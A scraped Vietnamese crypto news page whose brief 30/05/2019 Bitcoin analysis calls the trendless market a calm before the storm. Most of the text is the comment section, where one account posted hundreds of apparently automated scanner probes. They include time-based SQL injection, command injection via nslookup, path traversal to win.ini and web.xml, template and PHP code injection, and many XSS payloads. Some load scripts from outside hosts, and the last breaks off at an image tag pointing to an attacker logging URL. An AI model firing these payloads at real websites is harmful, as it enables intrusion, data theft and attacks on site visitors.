Phân tích Bitcoin ngày 30/05 - Bình yên trước bão lần nữa?

30/05/2019 - huy
1445
194

 

Lại tiếp tục là những biến động không có gì đáng để nói của BTCUSDT trên khung thời gian H4 này. Các nến được tạo ra vẫn nhỏ và volume cũng không có gì đáng chú ý. Như đã nói, nếu crypto trader chúng ta xả đạn lung tung ở giai đoạn này thì rất tốn sức vì giá chưa chịu chạy.

 

Bò hay Gấu gì cũng chưa thể hiện được rõ ràng ưu thế ở vùng giá hiện tại. Chúng ta biết rằng trạng thái thị trường luôn chuyển hóa từ 2 dạng là Xu Hướng => Không Xu Hướng => Xu Hướng. Giai đoạn hiện tại đang là Không Xu Hướng, như vậy nó là một dạng bình yên trước bão, trước khi BTCUSDT bước vào 1 giai đoạn có Xu Hướng tiếp theo.


Việc chúng ta vẫn như mọi ngày. Ai bốc vác cứ bốc vác, ai chạy grab cứ chạy grab, ai làm công nhân cứ làm công nhân và đợi một ngày "gió đông" quay trở lại, chúng ta sẽ lại đứng lên để trở thành các crypto trader hoành tráng.
 
 
Theo Traderviet
Để lại bình luận của bạn
Bình luận
rwejbolu
rwejbolu
30/08/2019 14:21

1

rwejbolu
rwejbolu
30/08/2019 15:51

1

rwejbolu
rwejbolu
30/08/2019 15:51

1

rwejbolu
rwejbolu
30/08/2019 15:51

1

rwejbolu
rwejbolu
30/08/2019 15:51

1

rwejbolu
rwejbolu
30/08/2019 15:51

1

rwejbolu
rwejbolu
30/08/2019 15:51

set|set&set

rwejbolu
rwejbolu
30/08/2019 15:51

1

rwejbolu
rwejbolu
30/08/2019 15:51

$(nslookup 4y7zQKPz)

rwejbolu
rwejbolu
30/08/2019 15:51

1

rwejbolu
rwejbolu
30/08/2019 15:51

1

rwejbolu
rwejbolu
30/08/2019 15:51

&nslookup NUH5V5Ed&'\"`0&nslookup NUH5V5Ed&`'

rwejbolu
rwejbolu
30/08/2019 15:51

1

rwejbolu
rwejbolu
30/08/2019 15:51

1

rwejbolu
rwejbolu
30/08/2019 15:51

Jln1LTke

rwejbolu
rwejbolu
30/08/2019 15:51

1

rwejbolu
rwejbolu
30/08/2019 15:51

1

rwejbolu
rwejbolu
30/08/2019 15:51

1

rwejbolu
rwejbolu
30/08/2019 15:51

1

rwejbolu
rwejbolu
30/08/2019 15:51

1

rwejbolu
rwejbolu
30/08/2019 15:51

1

rwejbolu
rwejbolu
30/08/2019 15:51

1

rwejbolu
rwejbolu
30/08/2019 15:51

1

rwejbolu
rwejbolu
30/08/2019 15:51

1

rwejbolu
rwejbolu
30/08/2019 15:51

1

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

response.write(9514341*9632492)

rwejbolu
rwejbolu
30/08/2019 15:52

'+response.write(9514341*9632492)+'

rwejbolu
rwejbolu
30/08/2019 15:52

12345'"\'\");|]*{
<>�''💩

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

"+response.write(9514341*9632492)+"

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

${9999577+9999796}

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

IQmulv9l

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

-1 OR 2+742-742-1=0+0+0+1 --

rwejbolu
rwejbolu
30/08/2019 15:52

-1 OR 2+156-156-1=0+0+0+1

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

rwejbolu
rwejbolu
30/08/2019 15:52

../../../../../../../../../../windows/win.ini

rwejbolu
rwejbolu
30/08/2019 15:52

C:\WINDOWS\system32\drivers\etc\hosts

rwejbolu
rwejbolu
30/08/2019 15:52

../../../../../../../../../../windows/win.ini.jpg

rwejbolu
rwejbolu
30/08/2019 15:52

)

rwejbolu
rwejbolu
30/08/2019 15:52

!(()&&!|*|*|

rwejbolu
rwejbolu
30/08/2019 15:52

1&n979585=v979273

rwejbolu
rwejbolu
30/08/2019 15:52

������������������������������������������������windows��win.ini

rwejbolu
rwejbolu
30/08/2019 15:52

................windowswin.ini

rwejbolu
rwejbolu
30/08/2019 15:52

^(#$!@#$)(()))******

rwejbolu
rwejbolu
30/08/2019 15:52

1some_inexistent_file_with_long_name.jpg

rwejbolu
rwejbolu
30/08/2019 15:52

-1' OR 2+84-84-1=0+0+0+1 --

rwejbolu
rwejbolu
30/08/2019 15:52

-1' OR 2+317-317-1=0+0+0+1 or 'JiJ3dLDD'='

rwejbolu
rwejbolu
30/08/2019 15:52

-1" OR 2+946-946-1=0+0+0+1 --

rwejbolu
rwejbolu
30/08/2019 15:52

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

rwejbolu
rwejbolu
30/08/2019 15:52

..\..\..\..\..\..\..\..\windows\win.ini

rwejbolu
rwejbolu
30/08/2019 15:52

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

rwejbolu
rwejbolu
30/08/2019 15:52

Http://testasp.vulnweb.com/t/fit.txt

rwejbolu
rwejbolu
30/08/2019 15:52

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

-1; waitfor delay '0:0:9' --

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

;print(md5(acunetix_wvs_security_test));

rwejbolu
rwejbolu
30/08/2019 15:52

-1); waitfor delay '0:0:9' --

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

-1)); waitfor delay '0:0:9' --

rwejbolu
rwejbolu
30/08/2019 15:52

';print(md5(acunetix_wvs_security_test));$a='

rwejbolu
rwejbolu
30/08/2019 15:52

http://testasp.vulnweb.com/t/xss.html?%00.jpg

rwejbolu
rwejbolu
30/08/2019 15:52

";print(md5(acunetix_wvs_security_test));$a="

rwejbolu
rwejbolu
30/08/2019 15:52

http://testasp.vulnweb.com/t/fit.txt?.jpg

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

${@print(md5(acunetix_wvs_security_test))}

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

${@print(md5(acunetix_wvs_security_test))}\

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

http://hitFSrxcLd3cV.bxss.me/

rwejbolu
rwejbolu
30/08/2019 15:52

'"()

rwejbolu
rwejbolu
30/08/2019 15:52

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

rwejbolu
rwejbolu
30/08/2019 15:52

testasp.vulnweb.com

rwejbolu
rwejbolu
30/08/2019 15:52

/www.vulnweb.com

rwejbolu
rwejbolu
30/08/2019 15:52

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

rwejbolu
rwejbolu
30/08/2019 15:52

WEB-INF/web.xml

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

phan-tich-bitcoin-ngay-3005-binh-yen-truoc-bao-lan-nua.html

rwejbolu
rwejbolu
30/08/2019 15:52

1 waitfor delay '0:0:9' --

rwejbolu
rwejbolu
30/08/2019 15:52

phan-tich-bitcoin-ngay-3005-binh-yen-truoc-bao-lan-nua.html

rwejbolu
rwejbolu
30/08/2019 15:52

phan-tich-bitcoin-ngay-3005-binh-yen-truoc-bao-lan-nua.html/.

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

WEB-INF\web.xml

rwejbolu
rwejbolu
30/08/2019 15:52

1 waitfor delay '0:0:3' --

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

p7NawJqI'; waitfor delay '0:0:9' --

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

jWP0tbt4'); waitfor delay '0:0:3' --

rwejbolu
rwejbolu
30/08/2019 15:52

'"

rwejbolu
rwejbolu
30/08/2019 15:52

5apwzxO4')); waitfor delay '0:0:3' --

rwejbolu
rwejbolu
30/08/2019 15:52

<!--

rwejbolu
rwejbolu
30/08/2019 15:52

-1;select pg_sleep(3); --

rwejbolu
rwejbolu
30/08/2019 15:52

-1);select pg_sleep(3); --

rwejbolu
rwejbolu
30/08/2019 15:52

-1));select pg_sleep(3); --

rwejbolu
rwejbolu
30/08/2019 15:52

1'"()&%<acx><ScRiPt >j8j1(9857)</ScRiPt>

rwejbolu
rwejbolu
30/08/2019 15:52

9vkC2Vqg';select pg_sleep(3); --

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

3I4Vw614');select pg_sleep(6); --

rwejbolu
rwejbolu
30/08/2019 15:52

JSf20Lcp'));select pg_sleep(6); --

rwejbolu
rwejbolu
30/08/2019 15:52

933'

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

'"()&%<acx><ScRiPt >j8j1(9094)</ScRiPt>

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

19937423

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:52

acu10039<s1﹥s2ʺs3ʹuca10039

rwejbolu
rwejbolu
30/08/2019 15:52

1

rwejbolu
rwejbolu
30/08/2019 15:53

1'"

rwejbolu
rwejbolu
30/08/2019 15:53

\

rwejbolu
rwejbolu
30/08/2019 15:53

acux3541��z1��z2a�bcxuca3541

rwejbolu
rwejbolu
30/08/2019 15:53

1����%2527%2522

rwejbolu
rwejbolu
30/08/2019 15:53

@@LoMHs

rwejbolu
rwejbolu
30/08/2019 15:53

JyI=

rwejbolu
rwejbolu
30/08/2019 15:53

�'�"

rwejbolu
rwejbolu
30/08/2019 15:53

�''�""

rwejbolu
rwejbolu
30/08/2019 15:53

CWS000x�=�1N�@E߮��I)�@��  �HiP"D�F� G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)� x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g�
]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0

rwejbolu
rwejbolu
30/08/2019 15:53

{{9999992*9999643}}

rwejbolu
rwejbolu
30/08/2019 15:53

1<ScRiPt >j8j1(9910)</ScRiPt>

rwejbolu
rwejbolu
30/08/2019 15:53

1<WBQLUX>BMK4K[!+!]</WBQLUX>

rwejbolu
rwejbolu
30/08/2019 15:53

1<script>j8j1(9730)</script>

rwejbolu
rwejbolu
30/08/2019 15:53

1<ScR<ScRiPt>IpT>j8j1(9337)</sCr<ScRiPt>IpT>

rwejbolu
rwejbolu
30/08/2019 15:54

1<ScRiPt
>j8j1(9774)</ScRiPt>

rwejbolu
rwejbolu
30/08/2019 15:54

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9947></ScRiPt>

rwejbolu
rwejbolu
30/08/2019 15:54

1<ScRiPt
>j8j1(9966)</ScRiPt>

rwejbolu
rwejbolu
30/08/2019 15:54

1<video><source onerror="javascript:j8j1(9278)">

rwejbolu
rwejbolu
30/08/2019 15:54

1<svg  

�onload=j8j1(9255);>

rwejbolu
rwejbolu
30/08/2019 15:54

1<isindex type=image src=1 onerror=j8j1(9786)>

rwejbolu
rwejbolu
30/08/2019 15:54

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9247'>

rwejbolu
rwejbolu
30/08/2019 15:54

1<body onload=j8j1(9417)>

rwejbolu
rwejbolu
30/08/2019 15:54

1<img src=//testasp.vulnweb.com/t/dot.gif onload=j8j1(9328)>

rwejbolu
rwejbolu
30/08/2019 15:54

1<img src=xyz OnErRor=j8j1(9521)>

rwejbolu
rwejbolu
30/08/2019 15:54

1<img/src=">" onerror=alert(9952)>

rwejbolu
rwejbolu
30/08/2019 15:54

%31%3C%53%63%52%69%50%74%20%3E%6A%38%6A%31%289869%29%3C%2F%73%43%72%69%70%54%3E

rwejbolu
rwejbolu
30/08/2019 15:54

1\u003CScRiPt\j8j1(9819)\u003C/sCripT\u003E

rwejbolu
rwejbolu
30/08/2019 15:54

1&lt;ScRiPt&gt;j8j1(9526)&lt;/sCripT&gt;

rwejbolu
rwejbolu
30/08/2019 15:54

�<img acu onmouseover=j8j1(9573) //�>

rwejbolu
rwejbolu
30/08/2019 15:54

1<input autofocus onfocus=j8j1(9673)>

rwejbolu
rwejbolu
30/08/2019 15:54

<a HrEF=http://www.vulnweb.com></a>

rwejbolu
rwejbolu
30/08/2019 15:55

<a HrEF=jaVaScRiPT:>

rwejbolu
rwejbolu
30/08/2019 15:55

[url=http://www.vulnweb.com][/url]

rwejbolu
rwejbolu
30/08/2019 15:55

1<img<!-- --> src=x onerror=alert(9018);//><!-- -->

rwejbolu
rwejbolu
30/08/2019 15:55

1}body{acu:Expre/**/SSion(j8j1(9875))}

rwejbolu
rwejbolu
30/08/2019 15:55

1<% contenteditable onresize=j8j1(9255)>

rwejbolu
rwejbolu
30/08/2019 15:55

1WlrZy
<ScRiPt >j8j1(9166)</ScRiPt>

rwejbolu
rwejbolu
30/08/2019 15:55

1<WPSSWG>PO63N[!+!]</WPSSWG>

rwejbolu
rwejbolu
30/08/2019 15:55

1<ifRAme sRc=9113.com></IfRamE>

rwejbolu
rwejbolu
30/08/2019 15:55

1<bf9loC x=9449>

rwejbolu
rwejbolu
30/08/2019 15:55

1<img sRc='http://attacker-9944/log.php?